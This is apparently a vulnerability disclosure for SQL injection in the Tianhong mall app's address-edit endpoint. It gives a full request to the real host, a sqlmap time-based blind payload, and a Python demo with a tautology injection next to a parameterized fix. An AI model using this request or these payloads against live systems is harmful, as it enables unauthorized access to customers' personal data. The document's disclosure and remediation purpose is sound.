SQL injection in one place in the Tianhong mall APP; the SQL statement needs input filtering (user data involved)
As the title says.
Tianhong mall APP, latest version 2.0.4.
The shipping address edit function has a SQL injection. Parameter: delivery_address_id
POST /center/delivery_address/edit HTTP/1.1
x-http-interface-v: 1.0.0
x-http-package: cn.rainbow.westore
x-http-devicetype: android
x-http-token: abcfd78b4f39cc4d1467731907e3755c
x-http-version: 2.0.4
x-http-timestamp: 1459129516
x-http-deviceuid: ffffffff-a95e-e042-5fcb-c4e600000000
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.1.1; MI 2 MIUI/4.12.5)
Host: member.honglingjin.cn
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 449

detail_address=11%E5%8F%B7&province_code=31345&area_code=100005&street=%E5%8D%97%E5%B1%B1%E8%A1%97%E9%81%93%E6%97%B6%E4%BB%A3%E9%AA%84%E5%AD%90&city=%E6%B7%B1%E5%9C%B3&store_code=00110&area=%E5%8D%97%E5%B1%B1%E5%8C%BA&consignee_name=%E4%BD%99%E7%94%9F&delivery_address_id=4996&province=%E5%B9%BF%E4%B8%9C%E7%9C%81&mobile_phone_number=13500000000&user_id=25000131900&city_code=31359&street_code=10000122&access_token=41128f3f23657fc460a6079faab54e70&
sqlmap output:

Parameter: delivery_address_id (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: detail_address=11%E5%8F%B7&province_code=31345&area_code=100005&street=%E5%8D%97%E5%B1%B1%E8%A1%97%E9%81%93%E6%97%B6%E4%BB%A3%E9%AA%84%E5%AD%90&city=%E6%B7%B1%E5%9C%B3&store_code=00110&area=%E5%8D%97%E5%B1%B1%E5%8C%BA&consignee_name=%E4%BD%99%E7%94%9F&delivery_address_id=4996 AND (SELECT * FROM (SELECT(SLEEP(5)))NESU)&province=%E5%B9%BF%E4%B8%9C%E7%9C%81&mobile_phone_number=13500000000&user_id=25000131900&city_code=31359&street_code=10000122&access_token=41128f3f23657fc460a6079faab54e70&
I did not dump that much data; see WooYun: a SQL injection in the Tianhong mall APP (involving 380 million+ mall user records and 330 million+ VIP user records), which is the same issue.
Solution:
Filter the SQL input.
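The following is an added example and is not code from the report or from the Tianhong mall APP; the table layout, the handler shape and the sample rows are all assumptions. It shows what the sqlmap finding above implies (delivery_address_id is pasted into the WHERE clause of the address edit query) and what the "filter the SQL input" fix looks like in practice: an integer check on delivery_address_id, bound parameters, and the update scoped to the authenticated user_id. SQLite has no SLEEP(), so the demonstration uses a tautology in the same position to show the attacker's control over the WHERE clause; the report's time-based payload is only run through the validator.

```python
import re
import sqlite3

# Constructed sample rows standing in for the app's address table.
# Schema and column names are assumptions, not taken from the app.
SAMPLE_ROWS = [
    (4996, 25000131900, "余生", "11号"),
    (4997, 25000131900, "余生", "12号"),
    (5001, 25000131901, "张三", "3号"),
]

# The time-based probe sqlmap reported for delivery_address_id.
TIME_BASED_PAYLOAD = "4996 AND (SELECT * FROM (SELECT(SLEEP(5)))NESU)"


def make_db():
    """In-memory stand-in for the mall database."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE delivery_address ("
        "id INTEGER PRIMARY KEY, user_id INTEGER, "
        "consignee_name TEXT, detail_address TEXT)"
    )
    conn.executemany("INSERT INTO delivery_address VALUES (?, ?, ?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def edit_address_vulnerable(conn, delivery_address_id, detail_address):
    """Assumed shape of the broken handler: the text field is quoted, but the
    numeric id is spliced straight into the statement. Returns rows updated."""
    sql = "UPDATE delivery_address SET detail_address = '%s' WHERE id = %s" % (
        detail_address.replace("'", "''"),
        delivery_address_id,
    )
    cur = conn.execute(sql)
    conn.commit()
    return cur.rowcount


def parse_address_id(raw):
    """The input filter the report asks for: the id must be ASCII digits only."""
    if not re.fullmatch(r"[0-9]+", raw):
        raise ValueError("delivery_address_id must be numeric")
    return int(raw)


def is_clean_address_id(raw):
    """True if the value would pass the filter, False if it would be rejected."""
    try:
        parse_address_id(raw)
        return True
    except ValueError:
        return False


def edit_address_safe(conn, delivery_address_id, user_id, detail_address):
    """Hardened handler: validated integer id, bound parameters, and the update
    limited to addresses owned by the authenticated user. Returns rows updated."""
    addr_id = parse_address_id(delivery_address_id)
    cur = conn.execute(
        "UPDATE delivery_address SET detail_address = ? WHERE id = ? AND user_id = ?",
        (detail_address, addr_id, user_id),
    )
    conn.commit()
    return cur.rowcount


def addresses(conn):
    """(id, detail_address) for every row, for inspecting the effect of an edit."""
    return conn.execute(
        "SELECT id, detail_address FROM delivery_address ORDER BY id"
    ).fetchall()


if __name__ == "__main__":
    conn = make_db()
    # Tautology in the id position: every user's address is overwritten.
    print("vulnerable rows updated:", edit_address_vulnerable(conn, "4996 OR 1=1", "hacked"))
    print(addresses(conn))

    conn = make_db()
    print("time-based payload passes filter:", is_clean_address_id(TIME_BASED_PAYLOAD))
    print("safe, own address:", edit_address_safe(conn, "4996", 25000131900, "11号"))
    print("safe, someone else's address:", edit_address_safe(conn, "5001", 25000131900, "x"))
```

The integer check alone closes the injection for this parameter, since a pure digit string cannot change the query's structure; binding the parameter makes that hold even if the check is later loosened, and the user_id condition stops a valid id from editing another customer's address.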